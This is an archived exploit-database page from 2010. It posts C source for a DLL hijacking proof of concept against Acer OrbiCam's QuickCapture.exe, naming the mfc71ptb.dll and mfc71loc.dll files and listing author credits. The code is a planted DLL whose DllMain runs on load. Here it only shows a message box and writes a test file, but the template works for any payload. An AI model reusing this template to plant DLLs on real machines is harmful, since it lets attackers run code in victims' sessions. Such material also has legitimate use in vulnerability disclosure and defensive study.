[local exploits] - Acer OrbiCam DLL Hijacking Exploit (mfc71
Posted on 19 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Acer OrbiCam DLL Hijacking Exploit (mfc71ptb.dll) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Acer OrbiCam DLL Hijacking Exploit (mfc71ptb.dll) by Inj3cti0n P4ck3t in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================= Acer OrbiCam DLL Hijacking Exploit (mfc71ptb.dll) ================================================= /* * * Acer OrbiCam 9.4.4.1084 DLL Hijacking Exploit (mfc71ptb.dll and mfc71loc.dll) * * Author: Inj3cti0n P4ck3t * * Contact e-mail: fer_henrick@hotmail.com * * Operating System: Windows XP (Version 5.1 Service Pack 3) * * Name Application: QuickCapture.exe * * Software Acer Orbicam 9.4.4.1084 * * Name DLL: mfc71ptb.dll and mfc71loc.dll * * Greetz: Inj3ct0r.com (Inj3ct0r Exploit DataBase) and fvox - HADES - M4V3RiCk - T4ph0d4 - DD3str0y3r - C00l3r - Archit3ct - Red Eye Crew * * */ #include <windows.h> #include <stdio.h> int teste() { MessageBox(0, "Test", "and Test", MB_OK); FILE *fp; fp = fopen("teste.txt", "w"); fwrite("it works ;-)", 1, 12, fp); fclose(fp); exit(1); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { teste(); return TRUE; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-19]</pre></body></html>